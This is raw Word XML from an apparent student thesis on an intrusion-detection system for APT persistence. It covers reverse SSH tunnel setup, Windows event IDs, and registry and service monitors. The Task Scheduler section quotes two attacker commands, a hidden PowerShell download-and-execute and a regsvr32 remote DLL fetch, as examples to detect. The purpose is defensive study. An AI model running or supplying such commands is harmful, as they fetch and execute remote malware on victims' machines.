    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Config Generating SSH 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ssh-keygen -t rsa</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 userserver@IPServer mkdir -p .ssh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cat .ssh/id_rsa.pub | ssh userserver@IPServer 'cat &gt;&gt; .ssh/authorized_keys'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a@A:~&gt; ssh-add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Config reverse shell to run on start up</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ubuntu@ubuntu:~$ cat /etc/init.d/reverseShell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#!/bin/sh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while true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count=`ps aux | grep "ssh -f -N -R 6969" | wc -l`;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lastRenderedPageBreak/>
        <w:t>if [ "$count" != "2" ]</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then</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 xml:space="preserve">   `ssh -f -N -T -R 6969:localhost:22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fi</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done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exit 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t>Add the following command to /etc/rc.local</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/etc/init.d/reverseShell &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00A53CB7" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Server</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7" w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to r</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:t>aspberry pi with ssh via command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh -p 6969 ubuntu@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc485239581"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cobalt Strike</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">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FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc485239582"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>External Knowledge</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:t>Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows event log is a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Some of event ID on windows to detect brute force</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4378"/>
        <w:gridCol w:w="4402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00326F1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Local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675</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos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4789, 4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: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258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC: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40965</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB: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681</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00326F1A">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>NTLM Login</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</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2.2.6.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>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FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>On the other hand, more malware is using Windows Task Scheduler to do its dirty work, such as backdoor, downloader and attack vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Some commands were used on APT 32 by task scheduler </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ powershell.exe -nop -w hidden -c  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="003137A0" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">              IEX</w:t>
            </w:r>
            <w:r w:rsidR="00FA5535" w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>((new-object net.webclient).downloadstring('http://remoteaddress.org:80/a'))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ </w:t>
            </w:r>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>regsvr32 /s /n /u /i:http://remoteaddress:80/download trojan.dll</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2.2.6.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In Windows NT operating systems, a Windows service is a computer program that operates in the background. Windows services can be configured to start when the operating system is started and run in the background as long as Windows is running. Alternatively, they can be started manually or by an event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:lastRenderedPageBreak/>
        <w:t>Identifying Vulnerable Network Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Many computers and network devices are deployed with default or improper configurations that expose them to various attacks. In some cases, the simple observation of a given protocol may indicate vulnerability.  Protocols such as Virtual Local Area Network (VLAN) trunking, network routing, and network redundancy protocols typically should not be propagated to the client. This is because an attacker with access to these protocols may be able to manipulate the flow of traffic across the network, expand access to other subnets, or cause denial of service.</w:t>
      </w:r>
      <w:r w:rsidR="007D073C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc485239583"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PROJECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E445CE">
        <w:t xml:space="preserve"> ARCHITECTURE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="0031762B" w:rsidRDefault="00E445CE" w:rsidP="008625D0">
      <w:r>
        <w:t>In this chapter, we would like to present about APTIDS, its functionalities and their operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc485239584"/>
      <w:r>
        <w:t>APTIDS’s overall architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>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73" w:name="_Toc485239585"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00CC0C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD03D9">
        <w:t>Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>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End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Therefore, to detect that any malicious executable program that has written its configurations and executable file path in to Registry Hive, we have to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74" w:name="_Toc485239586"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>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5" w:name="_Toc485239541"/>
      <w:r w:rsidRPr="004113CB">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3</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w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004113CB">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry Monitor architecture diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>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6" w:name="_Toc485239587"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>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7" w:name="_Toc485239588"/>
      <w:r>
        <w:t>Identifying Registry Change</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>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8" w:name="_Toc485239542"/>
      <w:r w:rsidRPr="00063A1C">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3</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2</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mechanism for detecting change in registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc485239589"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00672188">
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>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But what makes really excited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80" w:name="_Toc485239590"/>
      <w:r>
        <w:t>Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>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81" w:name="_Toc485239543"/>
      <w:r w:rsidRPr="00E646DE">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3</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3</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E646DE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>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82" w:name="_Toc485239591"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>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End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bookmarkStart w:id="83" w:name="_Toc485239592"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NotifyServiceStatusChange</w:t>
      </w:r>
      <w:r w:rsidR="007D1D38">
        <w:t xml:space="preserve"> and Asynchronous Procedure Calls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>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End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The condition according to which NotifyServiceStatusChange performs action. This condition is a DWORD value which is defined by a XORed operation between two defined integer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particular thread.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End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bookmarkStart w:id="84" w:name="_Toc485239544"/>
      <w:r w:rsidRPr="009D33EA">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3</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4</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009D33EA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> NotifyServiceStatusChange and APC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>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E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc485239593"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00E445CE">
        <w:t>Log Collector Hardware</w:t>
      </w:r>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> (2/6)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>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A1554A" w:rsidRDefault="00A1554A" w:rsidP="00A1554A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc485239594"/>
      <w:r>
        <w:t>Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="00A1554A" w:rsidRDefault="00A1554A" w:rsidP="00A1554A">
      <w:r>
        <w:t>The architecture of Log Collector Hardware can be graphically described in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRDefault="00E26D9F" w:rsidP="00134A20">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28C0FF6D" wp14:editId="357056EC">
            <wp:extent cx="5581650" cy="509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5097145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00134A20" w:rsidRPr="00134A20" w:rsidRDefault="00134A20" w:rsidP="00134A20">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc485239545"/>
      <w:r w:rsidRPr="00134A20">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3</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5</w:t>
      </w:r>
      <w:r w:rsidR="008A2754">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00134A20">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distributed Log Collector Hardware architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRDefault="00F4418A" w:rsidP="00A1554A"/>
    <w:p w:rsidR="00F4418A" w:rsidRPr="00F4418A" w:rsidRDefault="00C63970" w:rsidP="00F4418A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc485239595"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Distributed </w:t>
      </w:r>
      <w:r w:rsidR="00F4418A">
        <w:t>Log Collector Hardware workflow</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>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D8127C" w:rsidRDefault="00D8127C" w:rsidP="00D8127C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc485239596"/>
